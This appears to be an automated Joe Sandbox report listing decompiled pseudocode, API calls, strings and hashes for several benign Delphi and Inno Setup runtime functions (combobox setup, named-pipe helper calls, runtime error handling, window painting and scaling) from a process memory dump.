SetBkColor.GDI32(?,00000000), ref: 0041B4EF
SetBkMode.GDI32(?,00000001), ref: 0041B4FA

Part of subcall function 0041A270: GetSysColor.USER32(?), ref: 0041A27A

Memory Dump Source

Source File: 00000001.00000002.326723738.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.326717988.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.326805775.000000000048C000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.326813698.00000000004AE000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.326821048.00000000004BC000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_is-QPTG8.jbxd

Similarity

API ID: Color$ModeObject$BrushCreateIndirectSelectUnrealize
String ID:
API String ID: 3527656728-0
Opcode ID: 3dc7fc25730a89e41d4fe69907d6c2add98f8ae8ef1f52c3a7318e69f2a22891
Instruction ID: 409dfba64778dc73b06b03ac2b3f84a66ba6eb556fff99997c117ffb56144c37
Opcode Fuzzy Hash: 3dc7fc25730a89e41d4fe69907d6c2add98f8ae8ef1f52c3a7318e69f2a22891
Instruction Fuzzy Hash: EDF0BFB52015009BDF00FFBAD9C695B37989F14309704449AB548DF187C93DDD914B79

Uniqueness

Uniqueness Score: -1.00%

Function 0046DD14 Relevance: 8.9, APIs: 4, Strings: 1, Instructions: 144
windowCOMMON

Download Yara Rule

C-Code - Quality: 73%

			E0046DD14(void* __ebx, void* __edi, void* __esi) {
				char _v5;
				intOrPtr _v12;
				long _v16;
				char _v20;
				struct _WNDCLASSW _v60;
				long _v64;
				intOrPtr _t53;
				void* _t55;
				intOrPtr _t81;
				long _t90;
				intOrPtr _t103;
				void* _t106;
				intOrPtr _t117;
				intOrPtr _t120;
				void* _t133;
				void* _t135;
				void* _t136;
				intOrPtr _t137;
				void* _t142;
				void* _t148;

				_t131 = __esi;
				_t130 = __edi;
				_t135 = _t136;
				_t137 = _t136 + 0xffffffc4;
				_push(__esi);
				_push(__edi);
				_v64 = 0;
				_v16 = 0;
				_push(_t135);
				_push(0x46df16);
				_push( *[fs:eax]);
				 *[fs:eax] = _t137;
				_v12 = E0046DF48(1, __edi);
				_push(_t135);
				_push(0x46def1);
				_push( *[fs:edx]);
				 *[fs:edx] = _t137;
				if( *0x48c0e0 == 2 && GetClassInfoW(0, L"COMBOBOX",  &_v60) != 0) {
					 *0x4adf88 = _v60.lpfnWndProc;
					_push(E0046DCC8);
					_push(0xfffffffc);
					_t103 = E004183F8( *((intOrPtr*)(_v12 + 0x1b8)));
					_push(_t103);
					L004062BC();
					 *0x4adf8c = _t103;
				}
				_t53 =  *0x4ae1c4; // 0x21d2a4c
				_t55 =  *((intOrPtr*)(_t53 + 8)) - 1;
				if(_t55 < 0) {
					L14:
					_t105 =  *((intOrPtr*)(_v12 + 0x1b8));
					_t117 =  *0x48cb08; // 0x0
					E0042A274( *((intOrPtr*)(_v12 + 0x1b8)), E0040C310( *((intOrPtr*)( *((intOrPtr*)(_v12 + 0x1b8)) + 0xfc)), _t117));
					_t148 =  *((intOrPtr*)( *((intOrPtr*)( *((intOrPtr*)( *((intOrPtr*)(_v12 + 0x1b8)) + 0xfc)))) + 0x10))() - 1;
					if(_t148 <= 0) {
						_v5 = 1;
					} else {
						E00423068(_v12, _t105, _t130, _t131);
						_v5 = _t148 == 0;
						if(_v5 != 0 && E0042A258( *((intOrPtr*)(_v12 + 0x1b8))) >= 0) {
							E0047308C( *((intOrPtr*)( *((intOrPtr*)( *((intOrPtr*)( *((intOrPtr*)(_v12 + 0x1b8)) + 0xfc)))) + 0x14))(),  *((intOrPtr*)( *((intOrPtr*)( *((intOrPtr*)(_v12 + 0x1b8)) + 0xfc)))));
						}
					}
					_pop(_t120);
					 *[fs:eax] = _t120;
					_push(0x46def8);
					return E00402CA0(_v12);
				}
				_v20 = _t55 + 1;
				_t133 = 0;
				do {
					_t81 =  *0x4ae1c4; // 0x21d2a4c
					_t106 = E0040B654(_t81, _t133);
					_t142 = _t133 -  *0x48cb08; // 0x0
					if(_t142 == 0 ||  *((intOrPtr*)(_t106 + 0x2c)) == 0 || GetACP() ==  *((intOrPtr*)(_t106 + 0x2c))) {
						E00403708( &_v16, 0x46df44,  *((intOrPtr*)(_t106 + 4)));
						if( *0x48c0e0 != 2) {
							E00403CEC();
							_t90 =  *((intOrPtr*)( *((intOrPtr*)( *((intOrPtr*)( *((intOrPtr*)(_v12 + 0x1b8)) + 0xfc)))) + 0x2c))();
						} else {
							_t90 = SendMessageW(E004183F8( *((intOrPtr*)(_v12 + 0x1b8))), 0x143, 0, _v16);
						}
						if(_t90 >= 0) {
							 *((intOrPtr*)( *((intOrPtr*)( *((intOrPtr*)( *((intOrPtr*)(_v12 + 0x1b8)) + 0xfc)))) + 0x20))();
						}
					}
					_t133 = _t133 + 1;
					_t29 =  &_v20;
					 *_t29 = _v20 - 1;
				} while ( *_t29 != 0);
				goto L14;
			}

0x0046dd14
0x0046dd14
0x0046dd15
0x0046dd17
0x0046dd1b
0x0046dd1c
0x0046dd1f
0x0046dd22
0x0046dd27
0x0046dd28
0x0046dd2d
0x0046dd30
0x0046dd45
0x0046dd4a
0x0046dd4b
0x0046dd50
0x0046dd53
0x0046dd5d
0x0046dd76
0x0046dd7b
0x0046dd80
0x0046dd8b
0x0046dd90
0x0046dd91
0x0046dd96
0x0046dd96
0x0046dd9b
0x0046dda3
0x0046dda6
0x0046de59
0x0046de5c
0x0046de68
0x0046de77
0x0046de90
0x0046de91
0x0046ded7
0x0046de93
0x0046de96
0x0046de9c
0x0046dea4
0x0046ded0
0x0046ded0
0x0046dea4
0x0046dedd
0x0046dee0
0x0046dee3
0x0046def0
0x0046def0
0x0046ddad
0x0046ddb0
0x0046ddb2
0x0046ddb4
0x0046ddbe
0x0046ddc0
0x0046ddc6
0x0046dde3
0x0046ddef
0x0046de18
0x0046de31
0x0046ddf1
0x0046de0b
0x0046de0b
0x0046de36
0x0046de4c
0x0046de4c
0x0046de36
0x0046de4f
0x0046de50
0x0046de50
0x0046de50
0x00000000

APIs

GetClassInfoW.USER32 ref: 0046DD6A
740BB5A0.USER32(00000000,000000FC,Function_0006DCC8,00000000,COMBOBOX,?,00000000,0046DEF1,?,00000000,0046DF16), ref: 0046DD91
GetACP.KERNEL32(00000000,0046DEF1,?,00000000,0046DF16), ref: 0046DDCE
SendMessageW.USER32(00000000,00000143,00000000,?), ref: 0046DE0B

Strings

COMBOBOX, xrefs: 0046DD63

Memory Dump Source

Source File: 00000001.00000002.326723738.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.326717988.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.326805775.000000000048C000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.326813698.00000000004AE000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.326821048.00000000004BC000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_is-QPTG8.jbxd

Similarity

API ID: ClassInfoMessageSend
String ID: COMBOBOX
API String ID: 1455646776-1136563877
Opcode ID: 385ef100425be39dd420eea4b66739a9b29b5a1bed3997a44d7e79c4ebac7b4e
Instruction ID: ee211a155cb81e7606adb01a1cdc0a441ded5734a5c4e2e2d80ca761fd0cc26e
Opcode Fuzzy Hash: 385ef100425be39dd420eea4b66739a9b29b5a1bed3997a44d7e79c4ebac7b4e
Instruction Fuzzy Hash: E9515D34F00604AFDB10EF69C885E9D77B4EB49714F1141BAE805EB3A2EB39AD41CB59

Uniqueness

Uniqueness Score: -1.00%

Function 00456170 Relevance: 8.8, APIs: 1, Strings: 4, Instructions: 77
pipeCOMMON

Download Yara Rule

C-Code - Quality: 61%

			E00456170(intOrPtr __eax, void* __ebx, intOrPtr __edx, void* __edi, void* __esi) {
				long _v8;
				char _v16;
				void* _t10;
				int _t11;
				void _t33;
				intOrPtr _t39;
				intOrPtr _t40;
				intOrPtr _t47;
				intOrPtr _t48;
				void* _t52;

				_t45 = __esi;
				_t44 = __edi;
				_t47 = _t48;
				_push(0);
				_push(0);
				_push(0);
				_push(__esi);
				_push(__edi);
				_push(_t47);
				_push(0x4562a5);
				_push( *[fs:ecx]);
				 *[fs:ecx] = _t48;
				 *0x48df18 =  *0x48df18 + 1;
				_t33 =  *0x48df18; // 0x0
				 *0x48df20 = _t33;
				 *0x48df24 = __eax;
				 *0x48df28 = __edx;
				_t31 = 0xc + __edx;
				_push(_t47);
				_push(0x456245);
				_push( *[fs:eax]);
				 *[fs:eax] = _t48;
				_t10 =  *0x48df14; // 0x0
				_t11 = TransactNamedPipe(_t10, 0x48df20, 0xc + __edx, 0x49df2c, 0x10010,  &_v8, 0);
				_t49 = _t11;
				if(_t11 == 0) {
					E00451B58("TransactNamedPipe", _t31, _t33, __edi, __esi, _t49);
				}
				if(0x10 > _v8) {
					L4:
					E00451AFC("CallHelper: Response message has wrong size", _t31, _t44, _t45, _t51);
				} else {
					_t51 = _v8 - 0x10 -  *0x49df38;
					if(_v8 - 0x10 !=  *0x49df38) {
						goto L4;
					}
				}
				_t52 =  *0x49df2c -  *0x48df20; // 0x0
				if(_t52 != 0) {
					E00451AFC("CallHelper: Wrong sequence number", _t31, _t44, _t45, _t52);
				}
				_t53 =  *0x49df30;
				if( *0x49df30 == 0) {
					E00451AFC("CallHelper: Command did not execute", _t31, _t44, _t45, _t53);
				}
				_pop(_t39);
				 *[fs:eax] = _t39;
				_pop(_t40);
				 *[fs:eax] = _t40;
				_push(E004562AC);
				return E00403568( &_v16, 2);
			}

0x00456170
0x00456170
0x00456171
0x00456173
0x00456175
0x00456177
0x0045617a
0x0045617b
0x0045617e
0x0045617f
0x00456184
0x00456187
0x0045618a
0x00456190
0x00456196
0x0045619c
0x004561a1
0x004561ac
0x004561b0
0x004561b1
0x004561b6
0x004561b9
0x004561d2
0x004561d8
0x004561dd
0x004561df
0x004561e6
0x004561e6
0x004561f3
0x00456207
0x0045620c
0x004561f5
0x004561ff
0x00456205
0x00000000
0x00000000
0x00456205
0x00456216
0x0045621c
0x00456223
0x00456223
0x00456228
0x0045622f
0x00456236
0x00456236
0x0045623d
0x00456240
0x0045628c
0x0045628f
0x00456292
0x004562a4

APIs

TransactNamedPipe.KERNEL32(00000000,0048DF20,0000000C,0049DF2C,00010010,00000000,00000000,00000000,00456245,?,00000000,004562A5,?,?,00000000,00000000), ref: 004561D8

Part of subcall function 00451B58: GetLastError.KERNEL32(00000000,00451BF0,?,?,00000000,00000000,00000005,00000000,00452636,?,?,00000000,0048D628,00000004,00000000,00000000), ref: 00451B7C

Strings

TransactNamedPipe, xrefs: 004561E1
CallHelper: Command did not execute, xrefs: 00456231
CallHelper: Response message has wrong size, xrefs: 00456207
CallHelper: Wrong sequence number, xrefs: 0045621E

Memory Dump Source

Source File: 00000001.00000002.326723738.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.326717988.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.326805775.000000000048C000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.326813698.00000000004AE000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.326821048.00000000004BC000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_is-QPTG8.jbxd

Similarity

API ID: ErrorLastNamedPipeTransact
String ID: CallHelper: Command did not execute$CallHelper: Response message has wrong size$CallHelper: Wrong sequence number$TransactNamedPipe
API String ID: 1561970684-1127398157
Opcode ID: 67aa98a6b59fe60e02e5a0cf014c2cb0897d30c5752db6ad1289db506dbd6d44
Instruction ID: cbba78399afc9445e0097ed3c34f4e2d5bc055c57731bcf1f044daebf812baf2
Opcode Fuzzy Hash: 67aa98a6b59fe60e02e5a0cf014c2cb0897d30c5752db6ad1289db506dbd6d44
Instruction Fuzzy Hash: 7A21A771604204AFE711EF65EC42F1E77A8E748715F91487BFE01D3696D7B89808961C

Uniqueness

Uniqueness Score: -1.00%

Function 00404E7A Relevance: 8.8, APIs: 2, Strings: 3, Instructions: 72
windowCOMMON

Download Yara Rule

C-Code - Quality: 84%

			E00404E7A(int __eax) {
				intOrPtr* _t7;
				intOrPtr* _t8;
				signed int _t15;
				signed int _t19;
				intOrPtr _t20;
				unsigned int _t21;
				char* _t29;
				char* _t30;
				void* _t46;

				 *0x48d024 = __eax;
				if( *0x48d034 == 0) {
					goto L5;
				} else {
					_t46 =  *0x48d418 - 1;
					if(_t46 < 0) {
						L17:
						ExitProcess( *0x48d024);
					} else {
						if(_t46 == 0 || __eax != 0) {
							while(1) {
								L5:
								_t7 =  *0x48d028; // 0x404b60
								_t8 = _t7;
								if(_t8 == 0) {
									break;
								}
								 *0x48d028 = 0;
								 *_t8();
							}
							if( *0x48d02c != 0) {
								_t19 =  *0x48d024; // 0x0
								_t29 = "  at 00000000";
								do {
									_t2 = _t19 % 0xa;
									_t19 = _t19 / 0xa;
									 *_t29 = _t2 + 0x30;
									_t29 = _t29 - 1;
								} while (_t19 != 0);
								_t30 = 0x48c094;
								_t20 =  *0x48d02c; // 0x0
								_t21 = _t20 - 0x40121c;
								do {
									 *_t30 =  *((intOrPtr*)((_t21 & 0x0000000f) + 0x404f94));
									_t30 = _t30 - 1;
									_t21 = _t21 >> 4;
								} while (_t21 != 0);
								if( *0x48d035 != 0) {
									E0040515C(0x48d208, "Runtime error     at 00000000");
									E004050DF();
								} else {
									MessageBoxA(0, "Runtime error     at 00000000", "Error", 0);
								}
							}
							E00404E40(0x48d03c);
							E00404E40(0x48d208);
							E00401A98();
							if( *0x48d418 == 0) {
								E00403464();
								goto L17;
							}
						}
					}
				}
				E00403464();
				 *0x48d418 = 0;
				_t15 =  *0x48d024; // 0x0
				asm("sbb eax, eax");
				return  ~_t15 + 1;
			}

0x00404e7c
0x00404e88
0x00000000
0x00404e8a
0x00404e8a
0x00404e91
0x00404f57
0x00404f5d
0x00404e97
0x00404e97
0x00404ea1
0x00404ea1
0x00404ea1
0x00404ea6
0x00404ea8
0x00000000
0x00000000
0x00404eac
0x00404eb2
0x00404eb2
0x00404ebd
0x00404ebf
0x00404ec4
0x00404ece
0x00404ed0
0x00404ed0
0x00404ed5
0x00404ed7
0x00404ed8
0x00404edc
0x00404ee1
0x00404ee6
0x00404eeb
0x00404ef6
0x00404ef8
0x00404ef9
0x00404ef9
0x00404f05
0x00404f26
0x00404f2b
0x00404f07
0x00404f15
0x00404f15
0x00404f05
0x00404f35
0x00404f3f
0x00404f44
0x00404f50
0x00404f52
0x00000000
0x00404f52
0x00404f50
0x00404e97
0x00404e91
0x00404f62
0x00404f67
0x00404f6e
0x00404f75
0x00404f91

APIs

MessageBoxA.USER32 ref: 00404F15
ExitProcess.KERNEL32 ref: 00404F5D

Strings

Error, xrefs: 00404F09
Runtime error at 00000000, xrefs: 00404F0E, 00404F21
`K@, xrefs: 00404EA1, 00404EAC

Memory Dump Source

Source File: 00000001.00000002.326723738.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.326717988.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.326805775.000000000048C000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.326813698.00000000004AE000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.326821048.00000000004BC000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_is-QPTG8.jbxd

Similarity

API ID: ExitMessageProcess
String ID: Error$Runtime error at 00000000$`K@
API String ID: 1220098344-2860380777
Opcode ID: 46db2382e64b13f836b28f0b4a4f4c7eeae605f1127beaa8ff57c6a4eae7ff20
Instruction ID: f5843219a1cd4db4f0c045c0a488b172177e128e40d0f46163d998114cd4ebaa
Opcode Fuzzy Hash: 46db2382e64b13f836b28f0b4a4f4c7eeae605f1127beaa8ff57c6a4eae7ff20
Instruction Fuzzy Hash: 2F21B270E422418AD712BB79988171E27C1939B35CF04897FE240BB3E2C63C984687AE

Uniqueness

Uniqueness Score: -1.00%

Function 00423C9C Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 55
COMMON

Download Yara Rule

C-Code - Quality: 100%

			E00423C9C(void* __eax, void* __ecx) {
				struct HWND__* _v16;
				int _t17;
				void* _t28;
				void* _t33;
				long _t34;

				_t28 = __eax;
				_t17 =  *0x48d628; // 0x21d2410
				if( *((intOrPtr*)(_t17 + 0x20)) != 0) {
					if( *((intOrPtr*)(__eax + 0x74)) == 0) {
						 *_t34 =  *((intOrPtr*)(__eax + 0x20));
						EnumWindows(E00423C34, _t34);
						_t17 =  *(_t28 + 0x70);
						if( *((intOrPtr*)(_t17 + 8)) != 0) {
							_v16 = GetWindow(_v16, 3);
							if((GetWindowLongA(_v16, 0xffffffec) & 0x00000008) != 0) {
								_v16 = 0xfffffffe;
							}
							_t17 =  *(_t28 + 0x70);
							_t33 =  *((intOrPtr*)(_t17 + 8)) - 1;
							if(_t33 >= 0) {
								do {
									_t12 =  &_v16; // 0x424374
									_t17 = SetWindowPos(E0040B654( *(_t28 + 0x70), _t33),  *_t12, 0, 0, 0, 0, 0x13);
									_t33 = _t33 - 1;
								} while (_t33 != 0xffffffff);
							}
						}
					}
					 *((intOrPtr*)(_t28 + 0x74)) =  *((intOrPtr*)(_t28 + 0x74)) + 1;
				}
				return _t17;
			}

0x00423c9f
0x00423ca1
0x00423caa
0x00423cb0
0x00423cb5
0x00423cc0
0x00423cc5
0x00423ccc
0x00423cda
0x00423ceb
0x00423ced
0x00423ced
0x00423cf4
0x00423cfa
0x00423cfe
0x00423d00
0x00423d0a
0x00423d1a
0x00423d1f
0x00423d20
0x00423d00
0x00423cfe
0x00423ccc
0x00423d25
0x00423d25
0x00423d2b

APIs

EnumWindows.USER32(00423C34), ref: 00423CC0
GetWindow.USER32(?,00000003), ref: 00423CD5
GetWindowLongA.USER32 ref: 00423CE4
SetWindowPos.USER32(00000000,tCB,00000000,00000000,00000000,00000000,00000013,?,000000EC,?,?,?,004243C3,?,?,00423F8B), ref: 00423D1A

Strings

tCB, xrefs: 00423D0A, 00423D0E

Memory Dump Source

Source File: 00000001.00000002.326723738.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.326717988.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.326805775.000000000048C000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.326813698.00000000004AE000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.326821048.00000000004BC000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_is-QPTG8.jbxd

Similarity

API ID: Window$EnumLongWindows
String ID: tCB
API String ID: 4191631535-4013893092
Opcode ID: 42c1a3108d1966652383b620ef5f58b06600a869a03b4cc319858beed276cf81
Instruction ID: 4b956462b1ad48f48edaf6004990d1aa2628934630961f6d51159a6d3526b44e
Opcode Fuzzy Hash: 42c1a3108d1966652383b620ef5f58b06600a869a03b4cc319858beed276cf81
Instruction Fuzzy Hash: 85117071740220AFEB10EF28DC85F56B3E4EB08725F11066AF954AB2E6C778DD40CB59

Uniqueness

Uniqueness Score: -1.00%

Function 0044F528 Relevance: 8.8, APIs: 2, Strings: 3, Instructions: 16
COMMON

Download Yara Rule

C-Code - Quality: 80%

			E0044F528() {
				struct HINSTANCE__* _t5;
				intOrPtr _t6;

				E00404B7C(0x48c9b4);
				if( *0x48d034 == 0) {
					_t6 =  *0x48d020; // 0x44f4f4
					 *0x48d75c = _t6;
					 *0x48d020 = E0044F4F4;
				}
				E0044F4B8();
				E0044B450();
				_push("NotifyWinEvent");
				_t5 = GetModuleHandleA("user32.dll");
				_push(_t5);
				L00405AA4();
				 *0x48d748 = _t5;
				return _t5;
			}

0x0044f52d
0x0044f539
0x0044f53b
0x0044f540
0x0044f545
0x0044f545
0x0044f54f
0x0044f554
0x0044f559
0x0044f563
0x0044f568
0x0044f569
0x0044f56e
0x0044f573

APIs

GetModuleHandleA.KERNEL32(user32.dll,NotifyWinEvent,0048B2C3), ref: 0044F563
6D2B5550.KERNEL32(00000000,user32.dll,NotifyWinEvent,0048B2C3), ref: 0044F569

Strings

0!C, xrefs: 0044F540
user32.dll, xrefs: 0044F55E
NotifyWinEvent, xrefs: 0044F559

Memory Dump Source

Source File: 00000001.00000002.326723738.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.326717988.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.326805775.000000000048C000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.326813698.00000000004AE000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.326821048.00000000004BC000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_is-QPTG8.jbxd

Similarity

API ID: B5550HandleModule
String ID: 0!C$NotifyWinEvent$user32.dll
API String ID: 2448194625-309288517
Opcode ID: 29324265a08d3d7cc6e208030a643761c141432862eddbaced70722047aa217c
Instruction ID: ceb563bd2ec297e701c49a37b532a4a123f9b86f81342ce40c65f90110fb5c22
Opcode Fuzzy Hash: 29324265a08d3d7cc6e208030a643761c141432862eddbaced70722047aa217c
Instruction Fuzzy Hash: 61E0ECB0D0275569EB01BFB59882B0E3BE0A74930CF10493FB100A62D3CB7C90498F2D

Uniqueness

Uniqueness Score: -1.00%

Function 00416E44 Relevance: 7.6, APIs: 5, Instructions: 104
COMMON

Download Yara Rule

C-Code - Quality: 85%

			E00416E44(intOrPtr* __eax, void* __ebx, intOrPtr __edx, void* __edi, void* __esi) {
				intOrPtr* _v8;
				intOrPtr _v12;
				int _v16;
				int _v20;
				struct tagPAINTSTRUCT _v84;
				intOrPtr _t54;
				void* _t63;
				struct HDC__* _t73;
				intOrPtr _t87;
				void* _t94;
				void* _t95;
				void* _t97;
				void* _t99;
				void* _t100;
				intOrPtr _t101;

				_t99 = _t100;
				_t101 = _t100 + 0xffffffb0;
				_v12 = __edx;
				_v8 = __eax;
				_t73 =  *(_v12 + 4);
				if(_t73 == 0) {
					_t73 = BeginPaint(E004183F8(_v8),  &_v84);
				}
				_push(_t99);
				_push(0x416f5d);
				_push( *[fs:ecx]);
				 *[fs:ecx] = _t101;
				if( *((intOrPtr*)(_v8 + 0xb0)) != 0) {
					_v20 = SaveDC(_t73);
					_v16 = 2;
					_t94 =  *((intOrPtr*)( *((intOrPtr*)(_v8 + 0xb0)) + 8)) - 1;
					if(_t94 >= 0) {
						_t95 = _t94 + 1;
						_t97 = 0;
						do {
							_t63 = E0040B654( *((intOrPtr*)(_v8 + 0xb0)), _t97);
							if( *((char*)(_t63 + 0x37)) != 0 || ( *(_t63 + 0x1c) & 0x00000010) != 0 && ( *(_t63 + 0x35) & 0x00000004) == 0) {
								if(( *(_t63 + 0x34) & 0x00000040) == 0) {
									goto L11;
								} else {
									_v16 = ExcludeClipRect(_t73,  *(_t63 + 0x24),  *(_t63 + 0x28),  *(_t63 + 0x24) +  *((intOrPtr*)(_t63 + 0x2c)),  *(_t63 + 0x28) +  *((intOrPtr*)(_t63 + 0x30)));
									if(_v16 != 1) {
										goto L11;
									}
								}
							} else {
								goto L11;
							}
							goto L12;
							L11:
							_t97 = _t97 + 1;
							_t95 = _t95 - 1;
						} while (_t95 != 0);
					}
					L12:
					if(_v16 != 1) {
						 *((intOrPtr*)( *_v8 + 0x70))();
					}
					RestoreDC(_t73, _v20);
				} else {
					 *((intOrPtr*)( *_v8 + 0x70))();
				}
				E00416F98(_v8, 0, _t73);
				_pop(_t87);
				 *[fs:eax] = _t87;
				_push(E00416F64);
				_t54 = _v12;
				if( *((intOrPtr*)(_t54 + 4)) == 0) {
					return EndPaint(E004183F8(_v8),  &_v84);
				}
				return _t54;
			}

0x00416e45
0x00416e47
0x00416e4d
0x00416e50
0x00416e56
0x00416e5b
0x00416e6f
0x00416e6f
0x00416e73
0x00416e74
0x00416e79
0x00416e7c
0x00416e89
0x00416ea0
0x00416ea3
0x00416eb6
0x00416eb9
0x00416ebb
0x00416ebc
0x00416ebe
0x00416ec9
0x00416ed2
0x00416ee4
0x00000000
0x00416ee6
0x00416f01
0x00416f08
0x00000000
0x00000000
0x00416f08
0x00000000
0x00000000
0x00000000
0x00000000
0x00416f0a
0x00416f0a
0x00416f0b
0x00416f0b
0x00416ebe
0x00416f0e
0x00416f12
0x00416f1b
0x00416f1b
0x00416f23
0x00416e8b
0x00416e92
0x00416e92
0x00416f2f
0x00416f36
0x00416f39
0x00416f3c
0x00416f41
0x00416f48
0x00000000
0x00416f57
0x00416f5c

APIs

BeginPaint.USER32(00000000,?), ref: 00416E6A
SaveDC.GDI32(?), ref: 00416E9B
ExcludeClipRect.GDI32(?,?,?,?,?,?,00000000,00416F5D), ref: 00416EFC
RestoreDC.GDI32(?,?), ref: 00416F23
EndPaint.USER32(00000000,?,00416F64,00000000,00416F5D), ref: 00416F57

Memory Dump Source

Source File: 00000001.00000002.326723738.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.326717988.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.326805775.000000000048C000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.326813698.00000000004AE000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.326821048.00000000004BC000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_is-QPTG8.jbxd

Similarity

API ID: Paint$BeginClipExcludeRectRestoreSave
String ID:
API String ID: 3808407030-0
Opcode ID: 2007bbaaabde2b80d76e54260b1cee33b6f60b9b57cf65b0ab6bdaf5b5278d53
Instruction ID: e910eaf4371ed2f87099ab8c2693ee2c641150fd17c55409a25d5504233ca672
Opcode Fuzzy Hash: 2007bbaaabde2b80d76e54260b1cee33b6f60b9b57cf65b0ab6bdaf5b5278d53
Instruction Fuzzy Hash: C6413F70A042049FCB14DB59D585FAAB7F9EF48304F1641AAE5049B3A2C778DD85CB58

Uniqueness

Uniqueness Score: -1.00%

Function 00414A18 Relevance: 7.6, APIs: 5, Instructions: 102
COMMON

Download Yara Rule

C-Code - Quality: 100%

			E00414A18(intOrPtr* __eax, int __ecx, int __edx) {
				char _t46;
				signed char _t76;
				int _t83;
				intOrPtr* _t84;
				int _t85;
				int* _t87;

				 *_t87 = __ecx;
				_t83 = __edx;
				_t84 = __eax;
				if(__edx !=  *_t87) {
					if(( *(__eax + 0x1c) & 0x00000001) == 0) {
						_t76 =  *E00414B24; // 0x1f
					} else {
						_t76 =  *((intOrPtr*)(__eax + 0x5c));
					}
					if((_t76 & 0x00000001) == 0) {
						_t85 =  *(_t84 + 0x24);
					} else {
						_t85 = MulDiv( *(_t84 + 0x24), _t83,  *_t87);
					}
					if((_t76 & 0x00000002) == 0) {
						_t87[1] =  *(_t84 + 0x28);
					} else {
						_t87[1] = MulDiv( *(_t84 + 0x28), _t83,  *_t87);
					}
					if((_t76 & 0x00000004) == 0 || ( *(_t84 + 0x35) & 0x00000001) != 0) {
						_t87[2] =  *(_t84 + 0x2c);
					} else {
						_t87[2] = MulDiv( *(_t84 + 0x24) +  *(_t84 + 0x2c), _t83,  *_t87) - _t85;
					}
					if((_t76 & 0x00000008) == 0 || ( *(_t84 + 0x35) & 0x00000002) != 0) {
						_t87[3] =  *(_t84 + 0x30);
					} else {
						_t87[3] = MulDiv( *(_t84 + 0x28) +  *(_t84 + 0x30), _t83,  *_t87) - _t87[1];
					}
					 *((intOrPtr*)( *_t84 + 0x4c))(_t87[4], _t87[2]);
					if( *((char*)(_t84 + 0x39)) == 0 && (_t76 & 0x00000010) != 0) {
						E0041A5BC( *((intOrPtr*)(_t84 + 0x44)), MulDiv(E0041A5A0( *((intOrPtr*)(_t84 + 0x44))), _t83,  *_t87));
					}
				}
				_t46 =  *0x414b28; // 0x0
				 *((char*)(_t84 + 0x5c)) = _t46;
				return _t46;
			}

0x00414a1f
0x00414a22
0x00414a24
0x00414a29
0x00414a33
0x00414a3a
0x00414a35
0x00414a35
0x00414a35
0x00414a43
0x00414a57
0x00414a45
0x00414a53
0x00414a53
0x00414a5d
0x00414a76
0x00414a5f
0x00414a6d
0x00414a6d
0x00414a7d
0x00414aa1
0x00414a85
0x00414a98
0x00414a98
0x00414aa8
0x00414ace
0x00414ab0
0x00414ac5
0x00414ac5
0x00414ae6
0x00414aed
0x00414b0d
0x00414b0d
0x00414aed
0x00414b12
0x00414b17
0x00414b21

APIs

MulDiv.KERNEL32(?,?,?), ref: 00414A4E
MulDiv.KERNEL32(?,?,?), ref: 00414A68
MulDiv.KERNEL32(?,?,?), ref: 00414A91
MulDiv.KERNEL32(?,?,?), ref: 00414ABC
MulDiv.KERNEL32(00000000,?,00000000), ref: 00414B04

Memory Dump Source

Source File: 00000001.00000002.326723738.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true

